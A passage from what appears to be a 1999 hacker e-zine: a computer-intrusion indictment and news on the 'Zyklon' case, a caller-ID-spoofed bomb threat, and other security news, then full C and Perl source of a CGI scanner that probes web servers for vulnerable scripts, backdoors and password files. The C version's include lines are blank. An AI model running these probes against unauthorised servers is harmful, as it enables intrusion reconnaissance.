From on or about December 28, 1998, through on or about January 11, 1999, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein, knowingly and intentionally caused the transmission from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to computers operated by Issue Dynamics, Inc. in Alexandria, Virginia, and Washington, D.C., which were protected computers used in interstate commerce and communications, and caused loss aggregating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999.

(In violation of Title 18, United States Code, Section 1030(a)(5)(A).)

A TRUE BILL:

__________________________
FOREPERSON
UNITED STATES GRAND JURY

(signed)
______________________
Helen F. Fahey
United States Attorney

(signed)
______________________
Justin W. Williams
Assistant United States Attorney
Chief, Criminal Division

(signed)
______________________
Jack Henly
Assistant United States Attorney

-=-

Alleged USIA site hacker indicted
Grand jury hands down three counts of computer intrusion against ‘Zyklon’

By Brock N. Meeks
MSNBC

May 14 - A federal grand jury in Virginia Thursday charged a Washington state man, Eric Burns, with three counts of computer break-ins, including two high-profile hacks of the United States Information Agency. Burns, well-known in the electronic underground by his code name Zyklon, has also been questioned by the Secret Service in conjunction with other government site break-ins, MSNBC has learned.

Burns’ code name, mentioned in court papers, is taken from the poison gas used by the Nazis in concentration camps, and was mentioned on the recent hack of the White House Web site in a shout out (hacker slang for words of praise for a fellow hacker). However, no details were available as to whether Burns was being questioned by the Secret Service in conjunction with the White House hack. One source told MSNBC, after speaking with Burns, that the Secret Service questioned him about other government sites but not the White House hack. The Secret Service declined to comment.

However, a source familiar with the investigation, which was carried out by the Computer Crimes Division of the Federal Bureau of Investigation, confirmed that the bureau acknowledged another agency is also investigating Burns. Calls to the FBI to discuss their investigation of Burns were not returned.

The three alleged break-ins charged to Burns took place from August of last year to January, according to court papers. Attempts to contact Burns, who lives in Shoreline, Wash., by phone, were unsuccessful. One source who spoke to Burns said he was on a plane and heading for a court appearance in Virginia on Monday.

The three counts in the indictment are for attacks on the computers of Electric Press in Herndon, Va., which hosts the USIA Web site; LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which has computers in Alexandria, Va., and Washington, D.C. Each count mentions damages of at least $5,000.

The attack on USIA’s web site in January was particularly damaging and was the second time it had been allegedly hacked by Burns. Each of those hacks was signed by Zyklon. USIA, which operates the Voice of America broadcasts, is an extremely busy site; it’s a clearinghouse for U.S. information and heavily used by foreigners. The first USIA hack, which occurred in August, destroyed a lot of the site’s data, according to published reports at the time.

The second break-in seemed to be Burns’ way of working out his frustrations owing to a lost love. "Hack by Zyklon. Crystal, I love, (you?)" the hacked site said. In another Zyklon hacked site, this one of BellSouth, he laments that he has "massive depression," that he’s a "loser" and that because of it "I will never have my Crystal I will never be happy and I hope I goto [sic] prison and die."

Another hack attributed to Zyklon is that of the official Chinese human rights page, as seen on the Hacker News Network, which mirrors the hacked site. This hack appears to be an act of so-called hacktivism in which hackers break into systems, own them and put up politically charged speech.

-=-

ABC news;

Teen Hacker Indicted
‘Zyklon’ Not Charged in White House Attack

By Ted Bridis
The Associated Press

WASHINGTON, May 15 - A teen-ager identified as a computer hacker whose name appeared on the Internet site for the White House after vandals altered it this week has been indicted in Virginia on charges he broke into another government computer.

A grand jury indicted Eric Burns, 19, on three counts of computer intrusion. Burns, reportedly known on the Internet as Zyklon, was accused of breaking into a computer between August 1998 and January 1999 in northern Virginia that is used by the U.S. Information Agency.

Zyklon was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion.

‘A Serious Effort’

The indictment returned Thursday also accuses Burns of breaking into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics of Washington.

Sam Simon of Issue Dynamics said he was cooperating with the FBI. "We firmly believe that computer criminals need to be identified, prosecuted and caught, and we’re pleased that the FBI is not treating this as a minor matter. It wasn’t an insignificant incident. It was a very concentrated, serious effort over a period of time."

Burns was not charged in the attack on the White House computers. The opening page of the White House site was altered briefly to show a black Web page with the names of the hacker organizations claiming responsibility, along with messages, "Your box was own3d" and "Stop all the war." The page also included the phrase, "following peeps get some shouts," and listed a dozen names, including Zyklon.

@HWA

11.0 IRC war and a Police HQ bomb threat send two headed for trouble..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

CallerID Fooled In Omaha
contributed by hantai

A bomb threat was called in to the Omaha police headquarters recently. The Police responded to the address reported by CallerID. While the police were at that address another bomb threat was called in from the same number. US West says that there are some "technical pieces of equipment" the criminals could use to make a phone call appear to come from someone's number without actually being at that phone. (Yeah, it's called a butt set and telephone can on a street corner, real technical. Oh, and most of those cans aren't even locked.) HNN has received reports that the perpetrators of this prank are known as 'port' and 'rottenboy' on IRC and did this in retaliation for not being opped on an IRC channel.

Omaha NBC Affiliate Channel 6
http://www.discoveromaha.com/partners/wowt/news/1999/05/phone_threat_14.html

Police investigate mystery

A threatening phone call has led police to a mystery and so far the clues have turned up nothing more than dead ends. The call was made to Omaha police headquarters Thursday night: a bomb threat. With caller I-D on police phones, the name and address of the alleged caller was quickly discovered. Police made their way to a northwest Omaha home.

Officer Don Savage says, "When they arrived there, they met a young man who said he had a feeling that the police would be coming to his house that night." The young man had received an anonymous message on his computer telling him to expect a visit from the police.

While investigators were questioning the young man at his home, another call came in at police headquarters from the same number and address. Savage says, "911 contacted the sergeant on the scene at this house and asked 'is this the house?' And the sergeant confirmed no one had made a phone call from that house."

Carla Ewert with U.S. West says, "There are some technical pieces of equipment that are available if someone's going to use the phone lines dishonestly. And they technically could tap into someone's phone line from outside the house, never have to be in the person's home." Ewart says it's virtually impossible for someone to use their computer to call in a threat from someone else's phone line. She says the connection between voice and data are separated.

Right now police aren't sure what the computer connection is, or how the scheme was carried out. But a threat to their own house won't go unpunished. Channel six news talked to the family whose phone line has been used in this scheme.
They are also baffled as to how their phone line was tapped. Police say they intend to stay on the case until an arrest is made.

@HWA

12.0 UK Labels Windows as 'secure'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

UK Labels Windows as Secure
contributed by toka25

The U.K. Information Technology Security Evaluation Criteria (ITSEC) must have been hit on the head, dropped at birth, or be taking some really good drugs. Why? They have awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating. Microsoft says that this is "the highest security evaluation possible for a general-purpose operating system". Either this is all Microsoft spin or the testers have never heard about things like pwdump or L0phtCrack.

Microsoft Propaganda
http://www.microsoft.com/windows/dailynews/042999.htm

April 29, 1999

U.K. government evaluation confirms security of Microsoft Windows NT 4.0 platform
Windows NT platform receives high security evaluation

London—The British government this week concluded that the Microsoft® Windows NT® platform passes muster when it comes to security. After more than a year of intensive testing, the U.K. Information Technology Security Evaluation Criteria (ITSEC) certification board has awarded Windows NT Server 4.0 and Windows NT Workstation 4.0 an E3/FC-2 rating—generally acknowledged as the highest security evaluation possible for a general-purpose operating system.

The security standards agency evaluation included examinations of the source code and design documentation of Windows NT 4.0 with Service Pack 3. Testers also had direct access to the engineers who designed and tested the server operating system. Their conclusion: the Windows NT 4.0 architecture provides robust but flexible security.

"The successful ITSEC evaluation confirms the robust security and design of Windows NT," said Edmund Muth, group product manager at Microsoft. "The strong security and wide range of security-related features in Windows NT benefit customers—both those in industries where security is a paramount concern, like banking, government, healthcare and the military—and individuals who are concerned about their privacy and e-commerce."

The comprehensive security architecture in the Windows NT platform provides that level of safety. Its integrated security features include strong authentication, fine-grained access control, real-world auditing tools and secure communications.

Governments and enterprises around the world have already put those features to use. Last Fall, Brazil used a Windows NT-based network to securely host the largest electronic elections in history. Requiring the highest level of security, nearly 90 percent of NATO's headquarters and field sites in Europe and the United States use a Windows NT-based system to deliver tactical data and military messaging. And in the private sector, one of New Zealand's largest banks counts on Windows NT to provide secure banking over the Internet.

The ITSEC rating provides independent confirmation of the platform's security features. ITSEC is the only evaluation scheme recognized by the British government for use in secure and sensitive installations. It is also officially recognized by the governments of many European Union countries, Canada, the former Soviet republics and, with slight variations, in New Zealand and Australia. The E3/F-C2 evaluation is roughly equivalent to a C2 evaluation under the U.S. Trusted Computer Security Evaluation Criteria (TCSEC) regime, better known as the "Orange Book." Microsoft is separately pursuing a C2 evaluation for Windows NT 4.0, which is expected to be completed shortly.

But security isn't the only thing this platform offers. The multipurpose server operating system that forms the foundation of the BackOffice® family, Windows NT Server 4.0 offers a comprehensive set of services. From communications and file and print services to a platform for building and hosting Web- and client-server-based applications, Windows NT Server is built to meet the many needs of business. Windows NT Workstation 4.0, developed specifically for the business environment, makes it easy to use, manage and integrate those features. The operating system gives employees the intuitive look and feel of Windows® 98, so companies can cut training costs, and people can work productively right from the start.

The Windows NT platform is also the quickest path to Windows 2000, which is designed to be Microsoft's most robust and reliable operating system to date. Windows 2000 is also designed with security in mind. Microsoft is taking orders for the Beta 3 versions of Windows 2000 Server and Workstation. After Microsoft releases Windows 2000, the company plans to submit the operating system for a similar security evaluation under the Common Criteria, a new evaluation system that will consolidate the TCSEC and ITSEC criteria. The results could further the Windows platform's reputation for providing secure computing.

@HWA

13.0 Yugoslavia to stay plugged in
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Yugoslavia to Stay Online
contributed by Code Kid

After all the confusion over whether companies should or should not pull the plug on Yugoslavia, the Clinton administration has promised not to unplug the region from the rest of the net.

Wired
http://www.wired.com/news/news/politics/story/19697.html

14.0 VISA Releases Draft Protection Profile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Kingpin

According to Schneier's Crypto-Gram, Visa has issued a draft of the "Visa Smart Card Protection Profile" as part of the Common Criteria. It contains a very nice list of smart card attacks. The document is a draft, and they want comments.
Visa Smart Card Protection Profile
http://www.visa.com/nt/chip/accept.html
(you must agree to a disclaimer before being allowed to dl this pdf document)

The Visa document references the Common Criteria:

Common Criteria
http://csrc.ncsl.nist.gov/cc/

15.0 cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

/* ---------------------------------------------------------------------- */
/* CGI scanner v1.35, m0dify and recode by su1d sh3ll //UnlG 1999         */
/* Tested on Slackware linux with kernel 2.0.35;RH 5.2(2.0.36);           */
/* FreeBSD 2.2.2-3.1;IRIX 5.3                                             */
/* Source c0de by [CKS & Fdisk]                                           */
/* gr33tz to: Packet St0rm and Ken, ADM crew, ech0 security and CKS, ch4x,*/
/* el8.org users, #c0de, rain.forest.puppy/[WT], MnemoniX ,               */
/* hypoclear of lUSt,codex ;-) , K.A.L.U.G.                               */
/* fuck to: www.hackzone.ru , HDT... CHC fuck u 2 , llamaz                */
/* NATO and bill klinton <---- double fuck! :-) huh                       */
/* c0ming s00n: add-on for CGI scanner - for scan "C" class subnet & logs */
/* -----------------------------------------------[10:01 17.05.99 UnlG]- */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

void main(int argc, char *argv[])
{
  int sock,debugm=0;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;
  char foundmsg[] = "200";
  char *cgistr;
  char buffer[1024];
  int count=0;
  int numin,suxes=0;
  char cgibuff[1024];
  char *buff[100];    /* Don't u think 100 is enought? ;-)*/
  char *cginame[100]; /* Don't u think 100 is enought? */

  buff[1] = "GET /cgi-bin/unlg1.1 HTTP/1.0\n\n"; /* v0rt-fu when u modify source, check this first line.... that's my 8-) */
  buff[2] = "GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n";
  buff[3] = "GET /cgi-bin/phf HTTP/1.0\n\n";
  buff[4] = "GET /cgi-bin/Count.cgi HTTP/1.0\n\n";
  buff[5] = "GET /cgi-bin/test-cgi HTTP/1.0\n\n";
  buff[6] = "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n";
  buff[7] = "GET /cgi-bin/nph-publish HTTP/1.0\n\n";
  buff[8] = "GET /cgi-bin/php.cgi HTTP/1.0\n\n";
  buff[9] = "GET /cgi-bin/handler HTTP/1.0\n\n";
  buff[10] = "GET /cgi-bin/webgais HTTP/1.0\n\n";
  buff[11] = "GET /cgi-bin/websendmail HTTP/1.0\n\n";
  buff[12] = "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n";
  buff[13] = "GET /cgi-bin/faxsurvey HTTP/1.0\n\n";
  buff[14] = "GET /cgi-bin/htmlscript HTTP/1.0\n\n";
  buff[15] = "GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n";
  buff[16] = "GET /cgi-bin/perl.exe HTTP/1.0\n\n";
  buff[17] = "GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n";
  buff[18] = "GET /cgi-bin/www-sql HTTP/1.0\n\n";
  buff[19] = "GET /cgi-bin/view-source HTTP/1.0\n\n";
  buff[20] = "GET /cgi-bin/campas HTTP/1.0\n\n";
  buff[21] = "GET /cgi-bin/aglimpse HTTP/1.0\n\n";
  buff[22] = "GET /cgi-bin/glimpse HTTP/1.0\n\n";
  buff[23] = "GET /cgi-bin/man.sh HTTP/1.0\n\n";
  buff[24] = "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n";
  buff[25] = "GET /cgi-bin/filemail.pl HTTP/1.0\n\n";
  buff[26] = "GET /cgi-bin/maillist.pl HTTP/1.0\n\n";
  buff[27] = "GET /cgi-bin/jj HTTP/1.0\n\n";
  buff[28] = "GET /cgi-bin/info2www HTTP/1.0\n\n";
  buff[29] = "GET /cgi-bin/files.pl HTTP/1.0\n\n";
  buff[30] = "GET /cgi-bin/finger HTTP/1.0\n\n";
  buff[31] = "GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n";
  buff[32] = "GET /cgi-bin/survey.cgi HTTP/1.0\n\n";
  buff[33] = "GET /cgi-bin/AnyForm2 HTTP/1.0\n\n";
  buff[34] = "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n";
  buff[35] = "GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n";
  buff[36] = "GET /cgi-bin/environ.cgi HTTP/1.0\n\n";
  buff[37] = "GET /cgi-bin/wrap HTTP/1.0\n\n";
  buff[38] = "GET /cgi-bin/cgiwrap HTTP/1.0\n\n";
  buff[39] = "GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n";
  buff[40] = "GET /cgi-bin/edit.pl HTTP/1.0\n\n";
  buff[41] = "GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n";
  buff[42] = "GET /_vti_inf.html HTTP/1.0\n\n";
  buff[43] = "GET /_vti_pvt/service.pwd HTTP/1.0\n\n";
  buff[44] = "GET /_vti_pvt/users.pwd HTTP/1.0\n\n";
  buff[45] = "GET /_vti_pvt/authors.pwd HTTP/1.0\n\n";
  buff[46] = "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n";
  buff[47] = "GET /_vti_bin/shtml.dll HTTP/1.0\n\n";
  buff[48] = "GET /_vti_bin/shtml.exe HTTP/1.0\n\n";
  buff[49] = "GET /cgi-dos/args.bat HTTP/1.0\n\n";
  buff[50] = "GET /cgi-win/uploader.exe HTTP/1.0\n\n";
  buff[51] = "GET /cgi-bin/rguest.exe HTTP/1.0\n\n";
  buff[52] = "GET /cgi-bin/wguest.exe HTTP/1.0\n\n";
  buff[53] = "GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n";
  buff[54] = "GET /scripts/CGImail.exe HTTP/1.0\n\n";
  buff[55] = "GET /scripts/tools/newdsn.exe HTTP/1.0\n\n";
  buff[56] = "GET /scripts/fpcount.exe HTTP/1.0\n\n";
  buff[57] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
  buff[58] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
  buff[59] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";
  buff[60] = "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n";
  buff[61] = "GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n";
  buff[62] = "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n";
  buff[63] = "GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n";
  buff[64] = "GET /search97.vts HTTP/1.0\n\n";
  buff[65] = "GET /carbo.dll HTTP/1.0\n\n";
  /* we have at archive about 70 CGi , rule? ;-) */

  cginame[1] = "UnlG - backd00r ";
  cginame[2] = "THC - backd00r ";
  cginame[3] = "phf..classic :) ";
  cginame[4] = "Count.cgi ";
  cginame[5] = "test-cgi ";
  cginame[6] = "nph-test-cgi ";
  cginame[7] = "nph-publish ";
  cginame[8] = "php.cgi ";
  cginame[9] = "handler ";
  cginame[10] = "webgais ";
  cginame[11] = "websendmail ";
  cginame[12] = "webdist.cgi ";
  cginame[13] = "faxsurvey ";
  cginame[14] = "htmlscript ";
  cginame[15] = "pfdisplay ";
  cginame[16] = "perl.exe ";
  cginame[17] = "wwwboard.pl ";
  cginame[18] = "www-sql ";
  cginame[19] = "view-source ";
  cginame[20] = "campas ";
  cginame[21] = "aglimpse ";
  cginame[22] = "glimpse ";
  cginame[23] = "man.sh ";
  cginame[24] = "AT-admin.cgi ";
  cginame[25] = "filemail.pl ";
  cginame[26] = "maillist.pl ";
  cginame[27] = "jj ";
  cginame[28] = "info2www ";
  cginame[29] = "files.pl ";
  cginame[30] = "finger ";
  cginame[31] = "bnbform.cgi ";
  cginame[32] = "survey.cgi ";
  cginame[33] = "AnyForm2 ";
  cginame[34] = "textcounter.pl ";
  cginame[35] = "classifields.cgi";
  cginame[36] = "environ.cgi ";
  cginame[37] = "wrap ";
  cginame[38] = "cgiwrap ";
  cginame[39] = "guestbook.cgi ";
  cginame[40] = "edit.pl ";
  cginame[41] = "perlshop.cgi ";
  cginame[42] = "_vti_inf.html ";
  cginame[43] = "service.pwd ";
  cginame[44] = "users.pwd ";
  cginame[45] = "authors.pwd ";
  cginame[46] = "administrators ";
  cginame[47] = "shtml.dll ";
  cginame[48] = "shtml.exe ";
  cginame[49] = "args.bat ";
  cginame[50] = "uploader.exe ";
  cginame[51] = "rguest.exe ";
  cginame[52] = "wguest.exe ";
  cginame[53] = "bdir - samples ";
  cginame[54] = "CGImail.exe ";
  cginame[55] = "newdsn.exe ";
  cginame[56] = "fpcount.exe ";
  cginame[57] = "openfile.cfm ";
  cginame[58] = "exprcalc.cfm ";
  cginame[59] = "dispopenedfile ";
  cginame[60] = "sendmail.cfm ";
  cginame[61] = "codebrws.asp ";
  cginame[62] = "codebrws.asp 2 ";
  cginame[63] = "showcode.asp ";
  cginame[64] = "search97.vts ";
  cginame[65] = "carbo.dll ";

  if (argc<2)
  {
    printf("\n [-- CGI Checker 1.35. Modified by su1d sh3ll //UnlG --]");
    printf("\nusage : %s host ",argv[0]);
    printf("\n Or : %s host -d for debug mode\n\n",argv[0]);
    exit(0);
  }
  if (argc>2)
  {
    if(strstr("-d",argv[2]))
    {
      debugm=1;
    }
  }
  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }

  printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll //UnlG\n\n\n");

  start=inet_addr(argv[1]);
  counter=ntohl(start);
  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80); /* <--- if u want scan another port change it */
  /* codex when u again change this code pls call proggi like this 1.35.1 or 1.35.[a..z] ;-) */
  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {
    perror("connect");
  }

  printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
  getchar();

  /* CKS sorry, but ur new piece of code don't work :-( */
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);
  recv(sock, buffer, sizeof(buffer),0);
  printf("%s",buffer);
  close(sock);

  printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
  getchar();

  while(count++ < 65) /* huh! 65 cgi..... no secur1ty in th1s w0rld ;-)*/
  {
    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
      perror("connect");
    }
    printf("Searching for %s : ",cginame[count]);
    for(numin=0;numin < 1024;numin++)
    {
      cgibuff[numin] = '\0';
    }
    send(sock, buff[count],strlen(buff[count]),0);
    recv(sock, cgibuff, sizeof(cgibuff),0);
    cgistr = strstr(cgibuff,foundmsg);
    if( cgistr != NULL)
    {
      printf("Found !! ;)\n");++suxes;
    }
    else printf("Not Found\n");
    if(debugm==1)
    {
      printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
      printf("Press any key to continue....\n");
      getchar();
    }
    close(sock);
  }
  if (suxes){ printf("...have a nice hack... ;-)\n");}
  else {printf ("...n0thing wr0ng on server..... hmm...sucks!\n");}
}

@HWA

15.1 cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/perl
##############################################
#                                            #
# CGI scanner in perl                        #
# Written By: Epicurus (epicurus@wilter.com) #
#                                            #
# Based on a C version by su1d sh3ll         #
#                                            #
##############################################

use Socket;

@cgi_scripts = ("GET /cgi-bin/rwwwshell.pl HTTP/1.0\n\n","GET /cgi-bin/phf HTTP/1.0\n\n",
 "GET /cgi-bin/Count.cgi HTTP/1.0\n\n","GET /cgi-bin/test-cgi HTTP/1.0\n\n",
 "GET /cgi-bin/nph-test-cgi HTTP/1.0\n\n","GET /cgi-bin/nph-publish HTTP/1.0\n\n",
 "GET /cgi-bin/php.cgi HTTP/1.0\n\n","GET /cgi-bin/handler HTTP/1.0\n\n",
 "GET /cgi-bin/webgais HTTP/1.0\n\n","GET /cgi-bin/websendmail HTTP/1.0\n\n",
 "GET /cgi-bin/webdist.cgi HTTP/1.0\n\n","GET /cgi-bin/faxsurvey HTTP/1.0\n\n",
 "GET /cgi-bin/htmlscript HTTP/1.0\n\n","GET /cgi-bin/pfdispaly.cgi HTTP/1.0\n\n",
 "GET /cgi-bin/perl.exe HTTP/1.0\n\n","GET /cgi-bin/wwwboard.pl HTTP/1.0\n\n",
 "GET /cgi-bin/www-sql HTTP/1.0\n\n","GET /cgi-bin/view-source HTTP/1.0\n\n",
 "GET /cgi-bin/campas HTTP/1.0\n\n","GET /cgi-bin/aglimpse HTTP/1.0\n\n",
 "GET /cgi-bin/glimpse HTTP/1.0\n\n","GET /cgi-bin/man.sh HTTP/1.0\n\n",
 "GET /cgi-bin/AT-admin.cgi HTTP/1.0\n\n","GET /cgi-bin/filemail.pl HTTP/1.0\n\n",
 "GET /cgi-bin/maillist.pl HTTP/1.0\n\n","GET /cgi-bin/jj HTTP/1.0\n\n",
 "GET /cgi-bin/info2www HTTP/1.0\n\n","GET /cgi-bin/files.pl HTTP/1.0\n\n",
 "GET /cgi-bin/finger HTTP/1.0\n\n","GET /cgi-bin/bnbform.cgi HTTP/1.0\n\n",
 "GET /cgi-bin/survey.cgi HTTP/1.0\n\n","GET /cgi-bin/AnyForm2 HTTP/1.0\n\n",
 "GET /cgi-bin/textcounter.pl HTTP/1.0\n\n","GET /cgi-bin/classifieds.cgi HTTP/1.0\n\n",
 "GET /cgi-bin/environ.cgi HTTP/1.0\n\n","GET /cgi-bin/wrap HTTP/1.0\n\n",
 "GET /cgi-bin/cgiwrap HTTP/1.0\n\n","GET /cgi-bin/guestbook.cgi HTTP/1.0\n\n",
 "GET /cgi-bin/edit.pl HTTP/1.0\n\n","GET /cgi-bin/perlshop.cgi HTTP/1.0\n\n",
 "GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
 "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
 "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
 "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
 "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
 "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
 "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
 "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
 "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
 "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
 "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
 "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");

@cgi_names = ("THC - backdoor ","phf ","Count.cgi ","test-cgi ","nph-test-cgi ",
 "nph-publish ","php.cgi ","handler ","webgais ","websendmail ",
 "webdist.cgi ","faxsurvey ","htmlscript ","pfdisplay ","perl.exe ",
 "wwwboard.pl ","www-sql ","view-source ","campas ","aglimpse ",
 "glimpse ","man.sh ","AT-admin.cgi ","filemail.pl ","maillist.pl ",
 "jj ","info2www ","files.pl ","finger ","bnbform.cgi ",
 "survey.cgi ","AnyForm2 ","textcounter.pl ","classifields.cgi","environ.cgi ",
 "wrap ","cgiwrap ","guestbook.cgi ","edit.pl ","perlshop.cgi ",
 "_vti_inf.html ","service.pwd ","users.pwd ","authors.pwd ","administrators ",
 "shtml.dll ","shtml.exe ","args.bat ","uploader.exe ","rguest.exe ",
 "wguest.exe ","bdir - samples ","CGImail.exe ","newdsn.exe ","fpcount.exe ",
 "openfile.cfm ","exprcalc.cfm ","dispopenedfile ","sendmail.cfm ","codebrws.asp ",
 "codebrws.asp 2 ","showcode.asp ","search97.vts ","carbo.dll ");

print "CGI scanner [in Perl] v1.0\n\n";
print "Host: ";
chomp($remote=<STDIN>);
print "HTTP Port [80]: ";
chomp($port=<STDIN>);
if($port eq "") { $port=80; }
print "Log Session?(y/n)";
$yn=<STDIN>;
if($yn =~ /y/i) {
    $log = 1;
    $logfile="$remote".".scan";
    print "Log File [$logfile]: ";
    $file=<STDIN>;
    chop($file) if $file =~ /\n$/;
    if($file ne "") { $logfile=$file; }
    open(LOG,">>$logfile") || die("Unable to write to $logfile!");
    print LOG "Scanning $remote port $port\n\n";
}

print "Press [enter] to check the httpd version...\n";
$blah=<STDIN>;
$submit = "HEAD / HTTP/1.0\r\n\r\n";
if($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
&error("No port specified.") unless $port;
$iaddr = inet_aton($remote) || &error("Failed to find host: $remote");
$paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!");
$proto = getprotobyname('tcp') || &error("Unable to get protocol!");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
connect(SOCK, $paddr) || &error("Unable to connect: $!");
send(SOCK,$submit,0);
# print the banner the server sends back, line by line, until it closes
while(<SOCK>) {
    print $_;
    print LOG $_ if $log==1;
}
close(SOCK);

print "Press [enter] to check for CGI vulnerabilities...\n";
$blah=<STDIN>;
$i=0;
foreach $cgi_script(@cgi_scripts) {
    print "Searching for $cgi_names[$i] : ";
    print LOG "Searching for $cgi_names[$i] : " if $log==1;
    $submit=$cgi_script;
    &connect_n_check;
    $i++;
}
if($bad_security>0) {
    print "Server may have CGI vulnerabilities.\n";
    print LOG "Server may have CGI vulnerabilities.\n\n" if $log==1;
} else {
    print "No known CGI vulnerabilities found.\n";
    print LOG "No known CGI vulnerabilities found.\n\n" if $log==1;
}
close(LOG) if $log==1;
exit;

# open a fresh connection, send $submit and judge by the HTTP status line
sub connect_n_check {
    if($port =~ /\D/) { $port = getservbyname($port, 'tcp') }
    &error("No port specified.") unless $port;
    $iaddr = inet_aton($remote) || &error("Failed to find host: $remote");
    $paddr = sockaddr_in($port, $iaddr) || &error("Some fucking thing!");
    $proto = getprotobyname('tcp') || &error("Unable to get protocol!");
    socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
    connect(SOCK, $paddr) || &error("Unable to connect: $!");
    send(SOCK,$submit,0);
    $check=<SOCK>;
    ($http,$code,$blah) = split(/ /,$check);
    if($code == 200) {
        print "Found!\n";
        print LOG "Found!\n" if $log==1;
        $bad_security++;
    } else {
        print "Not Found\n";
        print LOG "Not Found\n" if $log==1;
    }
    close(SOCK);
}

sub error {
    $error = shift(@_);
    print "Error - $error\n";
    print LOG "Error - $error\n\n" if $log==1;
    close(LOG) if $log==1;
    exit;
}

@HWA

16.0 Vulnerability in Netscape bookmarks found by Georgi Guninski...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sun, 16 May 1999 17:17:34 +0300
From: Georgi Guninski
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator bookmarks security vulnerability

